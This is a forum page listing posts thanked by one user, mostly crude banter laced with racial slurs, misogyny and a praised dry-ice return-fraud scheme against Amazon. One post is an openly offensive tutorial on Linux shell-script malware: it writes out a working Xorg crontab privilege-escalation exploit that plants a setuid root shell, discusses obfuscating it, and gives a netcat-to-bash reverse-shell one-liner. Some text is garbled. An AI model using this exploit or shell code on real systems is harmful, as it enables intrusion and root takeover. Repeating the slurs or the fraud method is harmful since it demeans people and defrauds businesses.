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Posts That Were Thanked by Cowboy2013

  1. hydromorphone victim of incest [insincerely conduce my paisley]
    Originally posted by STER0S i'll take option #3 please

    ... I'm already in a few years deep...

    I find it funny though when other addicts say something like ”i won't let them inject me with that poison” lmfao all the while iving God knows what from the guy who can't learn his 6 times table.
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  2. Donald Trump Black Hole
    The terrorist regime which did 9/11 is finally fleeing Afghanistan

    I find this hilarious, some woke Afghan female CEO and WEF "Global Shaper" drugged up on benzos running around worrying about what happens when the Taliban get to her swanky mansion.

    I can imagine it being really interesting to see how everyone reacts. It must be like Berlin in 1945.
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  3. Kev Space Nigga
    Originally posted by Cowboy2013 And I was going to add to my post to have the hospital do a paternity test before you sign the birth certificate but 🤦‍♂️ Raising someone else’s kid is the ultimate in cuckery.

    he probably is raising someone elses kid
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  4. Kev Space Nigga
    we already pay fucking taxes on them, how do you think we buy them in the first place? on top of all the transfering fees and other overheads, we already lose 10% on every damn transaction every time we need to convert it to dollars unless we trade under the table.

    fucking greedy cunts.

    they can ban all they want, they wont stop the adoption, look how far banning online piracy got them.
    what really scares me is elon musks attempt to monopolize the entire internet. then he could intercept all crypto transactions, the fucking cunt.
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  5. Kev Space Nigga
    because you only need one penis to repopulate a village with 100 vaginas, you cant do the same with one vagina and 100 penises.

    this is why for all history the cunt has been put on a pedestal. this white knighting is a natural instinct, it was preservation of our species.

    as for circumcision, just take a fucking shower, not difficult is it?
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  6. Kev Space Nigga
    Originally posted by General Butt.Naked Dont worry bro its getting aborted in a month when he refuses to pony up $ for prenatal vitamins and she realizes the grave miscalculation shes made

    trapping a cuck with a child is never a miscalculation, she is guaranteed an income for 20 years and lots of free handouts from the gubmint. its any bitch's trump card
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  7. Donald Trump Black Hole
    One of the weirdest pay sites. This site is basically a bunch of hippies fucking to raise money to save the planet.
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  8. Swap that glock for a bicycle with a shopping basket on the a leader not a follower.

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  9. aldra JIDF Controlled Opposition
    why do you care what this gremlin thinks
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  10. Donald Trump Black Hole
    Lol, just like the orthodox jedis in April 2019
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  11. the man who put it in my hood Black Hole [miraculously counterclaim my golf]
    Originally posted by Chairman Takeshi Kaga Your personality is too weak to pressure candyrein into anything.

    SHut up bitch YOU ONLY LIVE ONCE and lets admit you aren't gonna find any good quality stuff round here so this is your only chance to have a clean ride.

    Originally posted by Donald Trump Congtats, the man who put it in my hood.

    You buy it! You own it!

    OTOH it's not like there was anyone in kyiv to tell you "OK, you own such".

    There is no one in moscow to yell you "OK, you own such".

    How do you respect someone who stands behind you?

    Shut up bitch you only live once. Doesn't matter if you are a russian dirt farmer or a chinese bush meat hunter because this is the Molecules of the holy creator a blessing onto humanity and a gift, do not take a drug to get high but take it to appreciate the experience of being alive in a universe where your brain can even process the chemicals and make you feel that way. There is bad with every good but if you trust in God you can get through anything namaste
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  12. the man who put it in my hood Black Hole [miraculously counterclaim my golf]
    Originally posted by Cowboy2013 Most black women are when it suits them. I think they probably spend more time in court filing against people for various things than doing anything else.

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  13. the man who put it in my hood Black Hole [miraculously counterclaim my golf]
    who the fuck asked
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  14. Sophie Pedophile Tech Support
    Originally posted by Cowboy2013 You’re on a coke binge planning on blowing shit up. You’re living the life my friend.

    Then again I don’t really appreciate my drug induced crimes as much as my sober ones.

    Lol, good point on both counts.
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  15. Sophie Pedophile Tech Support
    Welcome to another edition of Sophie's Cyber Shenanigans. This thread, i got some unconventional ways to work on *Nix based malware. And a couple questions for the level 97 shell script wizards.

    So i am experimenting with shell scripts, to find out what is and isn't viable should i want to create a shell script based malware for loonix. Why shell script? They're easily obfuscated, a bunch of utils have PE/Static binary formats you can bring along, or deploy remotely, and all distros have `Sh` and almost always `Bash` as far as i am aware.

    What's more, shell scripts, allow one to invoke commands and operations from any scripting lang that have their interpreter installed on the distro you are targeting 'out of the box' as it. Which tend to be quite a few.

    Chances are you'll have access to: Perl, Python, Lua, TclSh, M4(Plus other Macro 'langs') and if you're lucky PHP, Ruby, Node and so on and so forth.

    Another benefit of using `Sh` or `Bash` is that you don't have to worry about compatibility issues. Should you want to make use of payloads written in let's say C, you have the opportunity to perform Recon simply with the `uname -svm` command and then you'll have the proper architecture and kernel version. Which is great to know if you want to write an exploit for the system you're on.

    Here's an example.


    # There are a bunch of vulns in the Xorg server and related utils like
    # X.Org xorg-x11-xfs - Local Race Condition
    # xorg-x11-server - 'inittab Local Privilege Escalation
    # And much more, we're gonna do the second one as an example
    # When ##!!## occurs in the script i got some annotations below
    cat << EOF > /tmp/x_orgasm
    cp /bin/sh /usr/local/bin/pwned ##!!##_1
    echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > /tmp/pwned.c
    gcc /tmp/pwned.c -o /usr/local/bin/pwned ##!!##_2
    chmod 4777 /usr/local/bin/pwned

    chmod +x /tmp/x_orgasm

    # prepare your anus
    cd /etc
    Xorg -fp "* * * * * root /tmp/x_orgasm" -logfile crontab :1 & ##!!##_3
    sleep 5
    pkill Xorg ##!!##_4

    sleep 120

    ls -l /etc/crontab*
    ls -l /usr/local/bin/pwned

    # Start elevated Sh

    Before you say: you can't just copy /bin/sh. Well we don't really need to the line after that builds a Sh shell too.
    If you're afraid we won't have permissions for `gcc` here's something that'll do exactly the same with UID 0.

    Alternatively we could ship a shell in Asm with the payload up top.


    /tmp and some of the other directories featured here get mounted as NOSUID which is good. Because NOSUID beats root.

    /usr/local/bin is part of the $PATH and has MODE 2775/drwxrwsr-x


    The operation here is what triggers the bug. Without getting too much into the weeds killing Xorg at ##!!##_4 with pkill will cause inittab to retart the cronjob related to Xorg that we changed with the operation we ran previously which then starts our 'pwned' Sh with root privileges.


    There's tools to obfuscate bash. Which is great. Here's an example of this same script obfuscated with the methods below.

    String/Hex Hash, 1 Iteration
    Token/ForCode, 1 Iteration

    Find the result here

    Or if you prefer a picture check the spoiler out below.

    Anyway, i hope you found that informative. However before you go i do actually have a question for the level 97 shell script wizards.

    I want to have a function in a shell script that i can call with different commands, so `cmd_func cat /etc/passwd`. My current implementation looks like this:

    #!/usr/bin/env -S sh\_"umask\_700"\_-f
    # BTW This is legal right ^
    # I'm U_masking because i am writing stuff out
    # Under a specific user account

    { # I want to run it through a FIFO pipe/buffer in fact it is a requirement.
    mknod u_dev p && cat < `read -t (${cmd $'\0' arg})` 0<u_dev | /bin/bash 1>u_dev

    buff_ops CMD ARG # <- is what i want

    I figured it should be good since stuff like this works also:

    rm -f x; mknod x p && nc 1337 0<x | /bin/bash 1>x

    Thicc threads niggas. One on low level security and dev incoming soon as well.
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  16. Kodi is still a thing
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  17. I had a 4 day old boiled egg for breakfast.
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  18. Donald Trump Black Hole
    This is genius - when returning electronics to amazon you put dry ice into a box and send it, making sure to insure it and get proof of postage, including weight. The dry ice evaporates while the box is in transit, so amazon receive an empty box, and assume the item was stolen in transit.
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  19. the man who put it in my hood Black Hole [miraculously counterclaim my golf]
    by legal I mean non regulated
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  20. aldra JIDF Controlled Opposition
    Originally posted by rabbitweed Yeah all those Americans getting in rafts and escaping Miami to live in Cuba 'cause there's no depression.

    You're full on retarded sometimes.

    it's almost like blockading the country for 50 years makes life difficult for people
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